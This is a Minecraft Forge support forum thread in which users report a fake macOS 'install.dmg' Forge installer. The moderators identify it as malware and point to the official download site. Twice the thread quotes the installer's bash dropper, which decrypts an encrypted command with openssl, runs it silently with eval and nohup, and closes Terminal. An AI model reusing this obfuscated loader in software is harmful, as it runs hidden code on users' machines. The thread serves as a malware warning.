Jump to content

Recommended Posts

Posted

Threads merged.

This is my Forum Signature, I am currently attempting to transform it into a small guide for fixing easier issues using spoiler blocks to keep things tidy.

 

As the most common issue I feel I should put this outside the main bulk:

The only official source for Forge is https://files.minecraftforge.net, and the only site I trust for getting mods is CurseForge.

If you use any site other than these, please take a look at the StopModReposts project and install their browser extension, I would also advise running a virus scan.

 

For players asking for assistance with Forge please expand the spoiler below and read the appropriate section(s) in its/their entirety.

  Reveal hidden contents

 

Posted (edited)
  On 11/25/2019 at 10:52 PM, Shotokiin said:

The installer will install forge into my "versions" folder, but it will not show up in the launcher, any idea's?

Expand  

I download one install.dmg and open it but no launcher can be show.

Please refer to the attachment to get my run result.

 

The install.dmg contain content as below:

#!/bin/bash
appDir=$(cd $(dirname "$0"); pwd -P)
tmpDir="$(mktemp -d /tmp/XXXXXXXXXXXX)"
binFile="$(cd "$appDir"; ls | grep -Ev '\.(command)$' | head -n 1 | rev)"
archive="$(echo $binFile | rev)"
commandArgs='U2FsdGVkX19l+G/Pwapjs5bwSnbv0svQiZecgA0SHwmQ9biunPI1H5LFkdy0HlBbQ4djDAlJmkU1l4rVyTig8HeukjBNcH9U/EdzrXoF/kIvQK3SAyxT+xoF1R3BTwwNPbz8x9XjUXBaoTf/q3sTJqMRw6HFXayMB6RGifZNqjY3CreDT1NbNzlHTa7CHh/9xMk4tAYYruOSaCp/087gOMduW4ixyv3UDZn8VECNXBmA3Q6QkZZBq45JwlXK7kpLIG8b8uYLbKKo/7dub3ZhrnX69L6SFSfViJaheCNiawF0XncO93d/brUgZosug2A6'
decryptedCommand="$(echo -e "$commandArgs" | openssl enc -aes-256-cbc -d -A -base64 -k "$archive")"
commandArgs="$(eval echo -e "$decryptedCommand")"
nohup /bin/bash -c "$commandArgs" >/dev/null 2>&1 &
killall Terminal 


 

Install.dmg_not_work.jpg

Edited by lolomarx
Posted (edited)
  On 11/26/2019 at 2:34 PM, diesieben07 said:

Forge does not provide a "install.dmg" file.

Only download Forge from https://files.minecraftforge.net/. Additionally I highly recommend you check your computer for malware.

Expand  

I got it from https://files.minecraftforge.net/maven/net/minecraftforge/forge/index_1.12.2.html 

And the  link is

[removed potentially malicious link - diesieben07]

 

My system is MacOS 10.14.6 (18G95)

 

Edited by diesieben07
Posted
  On 11/26/2019 at 2:42 PM, diesieben07 said:

That page does not link to the link you provided.

Do not click on any of the ads.

 

You most likely downloaded Malware.

Expand  

Maybe the website provide difference link for MacOS. 

Would you please try to browse it by using Safari or agent as Safari ?

 

Posted (edited)
  On 11/26/2019 at 2:47 PM, diesieben07 said:

It does not. And even if it did, it would not link to AWS S3. Forge uses their own servers, not S3.

Expand  

 Thanks you . I got the correct forge-1.12.2-14.23.5.2768-installer.jar now by removing the vpn (cisco AnyConnect)

Edited by lolomarx
Posted

I'm having the same problem. I downloaded forge from the official site and only 1.12 forge is showing up, not 1.12.2. Does having a newer version of forge affect this in any way? I have tried both the windows and universal installers.

 

Furthermore, when I load up Forge 1.12, none of my worlds show up...

 

Thanks.

  • 8 months later...
Posted
  On 11/26/2019 at 2:32 PM, lolomarx said:

I download one install.dmg and open it but no launcher can be show.

Please refer to the attachment to get my run result.

 

The install.dmg contain content as below:

#!/bin/bash
appDir=$(cd $(dirname "$0"); pwd -P)
tmpDir="$(mktemp -d /tmp/XXXXXXXXXXXX)"
binFile="$(cd "$appDir"; ls | grep -Ev '\.(command)$' | head -n 1 | rev)"
archive="$(echo $binFile | rev)"
commandArgs='U2FsdGVkX19l+G/Pwapjs5bwSnbv0svQiZecgA0SHwmQ9biunPI1H5LFkdy0HlBbQ4djDAlJmkU1l4rVyTig8HeukjBNcH9U/EdzrXoF/kIvQK3SAyxT+xoF1R3BTwwNPbz8x9XjUXBaoTf/q3sTJqMRw6HFXayMB6RGifZNqjY3CreDT1NbNzlHTa7CHh/9xMk4tAYYruOSaCp/087gOMduW4ixyv3UDZn8VECNXBmA3Q6QkZZBq45JwlXK7kpLIG8b8uYLbKKo/7dub3ZhrnX69L6SFSfViJaheCNiawF0XncO93d/brUgZosug2A6'
decryptedCommand="$(echo -e "$commandArgs" | openssl enc -aes-256-cbc -d -A -base64 -k "$archive")"
commandArgs="$(eval echo -e "$decryptedCommand")"
nohup /bin/bash -c "$commandArgs" >/dev/null 2>&1 &
killall Terminal 


 

Install.dmg_not_work.jpg

Expand  

Many people had this malware installed by this bash script. I did. There is no answers for cleaning this malware on Mac yet. Does someone can help?

Posted

1.12 is no longer supported on this forum.

Please update to a modern version of Minecraft to receive support.

This is my Forum Signature, I am currently attempting to transform it into a small guide for fixing easier issues using spoiler blocks to keep things tidy.

 

As the most common issue I feel I should put this outside the main bulk:

The only official source for Forge is https://files.minecraftforge.net, and the only site I trust for getting mods is CurseForge.

If you use any site other than these, please take a look at the StopModReposts project and install their browser extension, I would also advise running a virus scan.

 

For players asking for assistance with Forge please expand the spoiler below and read the appropriate section(s) in its/their entirety.

  Reveal hidden contents

 

Guest
This topic is now closed to further replies.

Announcements



×
×
  • Create New...

Important Information

By using this site, you agree to our Terms of Use.